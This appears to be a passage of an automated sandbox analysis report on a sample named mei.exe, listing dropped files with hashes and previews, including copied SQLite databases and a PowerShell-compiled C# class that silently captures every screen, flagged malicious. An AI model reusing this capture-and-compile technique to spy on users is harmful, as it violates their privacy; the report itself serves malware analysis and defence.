                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvku0nha.nt1.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4bhckho.0l1.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1gtztzw.3sk.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olzkaf0r.bev.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opku2i2h.onf.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbjvg2s1.p0u.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svxgnmnn.to5.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfuadazy.czl.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxrisqvv.1ms.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wk2kjbb0.t0j.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaoveqbd.ixm.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfwc5szl.5wf.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\do6D88Jw52.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):106496
                                                                                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tH5nHKu7df.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):126976
                                                                                                                                                                    Entropy (8bit):0.47147045728725767
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                    MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                    SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                    SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                    SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\wYeoB2Z9d4.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                    Entropy (8bit):0.7873599747470391
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                    MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                    SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                    SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                    SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\wgovk1sp\CSC886C9BC3BEB4426790141765FCC41D4.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:MSVC .res
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):652
                                                                                                                                                                    Entropy (8bit):3.114663539189021
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFwak7Ynqq81PN5Dlq5J:+RI+ycuZhNgakSsPNnqX
                                                                                                                                                                    MD5:DADA2FBCA79F9EA3D820A4E11758CD7E
                                                                                                                                                                    SHA1:7865FCEB755E04A8F287CC198C7A731FB2E3C312
                                                                                                                                                                    SHA-256:E1D3A5353335BA301452FB714CC518C73CED9F759FBE004655F673C4623A1031
                                                                                                                                                                    SHA-512:23E05E2D5A552F0247F4CF77477AFFC36DD044AC83C9E80EED1E287907691D6533EEEBC47555AEF559F73A2EC20752DF5C3B85E3BB8051385AFED55057CDD171
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.g.o.v.k.1.s.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.g.o.v.k.1.s.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.0.cs

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1004
                                                                                                                                                                    Entropy (8bit):4.154581034278981
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                                                                                                    MD5:C76055A0388B713A1EABE16130684DC3
                                                                                                                                                                    SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                                                                                                    SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                                                                                                    SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):607
                                                                                                                                                                    Entropy (8bit):5.348297667294841
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOf8FWZEif8A:V3ka6KOkqeFkOftEifZ
                                                                                                                                                                    MD5:08F16455FC37A5C69707AA44F34DC99B
                                                                                                                                                                    SHA1:EA271B340DEB08A53850B33C96D46B8B5C82D8BF
                                                                                                                                                                    SHA-256:911D9998566409CCCE2EF51E1E43B75192454D5DF67A818E0D88F7DEDB38C661
                                                                                                                                                                    SHA-512:5375EF30E6ED2569E1A2AFCBBE39D8B8908D1E11A9C2B3D9030A9E0046B8CCEF7C1C739FE88728CA54C5293182B7B03E0213EBF440DAD73ECF93E1F77CF390C2
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.0.cs"

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4096
                                                                                                                                                                    Entropy (8bit):3.159055411680021
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:6r7oEAtf0KhzBU/ef6mtJ5N0xpW1ulga38q:dNz0hmBOReK
                                                                                                                                                                    MD5:69B7387AB0B8B0E79B92AEB468B27409
                                                                                                                                                                    SHA1:F693E0EC43FBB1B60AF0613BEFF5E2B01490D23D
                                                                                                                                                                    SHA-256:9A70B06A196D31AA9DF9B3E4BF1E05E2015DEE5C046F308CF7715EF14C96E0BA
                                                                                                                                                                    SHA-512:0791C5B1EB8D12D08D5E81365AE7F74ECCAFF34370DF3F2FE2CDC30237726F6D04A955237A45111314F6D06DB86CA2E8CDF24F305E347AA911C69EEE36A9D957
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r>pe...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.out

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):1147
                                                                                                                                                                    Entropy (8bit):5.500661152759543
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:KJfvId3ka6KOkqeFkOftEifcKax5DqBVKVrdFAMBJTH:uvkka6NkqeFkytEucK2DcVKdBJj
                                                                                                                                                                    MD5:8A59FFFF1D43C090DFBB4E11AD3CDE01
                                                                                                                                                                    SHA1:459628311284319D5CADCBE9ADA3481D42764AB1
                                                                                                                                                                    SHA-256:B41EBA522F77095324D79BF086C56BE135C2825CFDD768B4F29230976958DF6B
                                                                                                                                                                    SHA-512:BE3C0698BBB70033947F50B8CD7394C504FB9808E378C12DE4F815483D0CFF584B4E1F16137DCD8E82B325B57350A9BFE779876DAD4242B84EDB1F553FB8CA57
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer

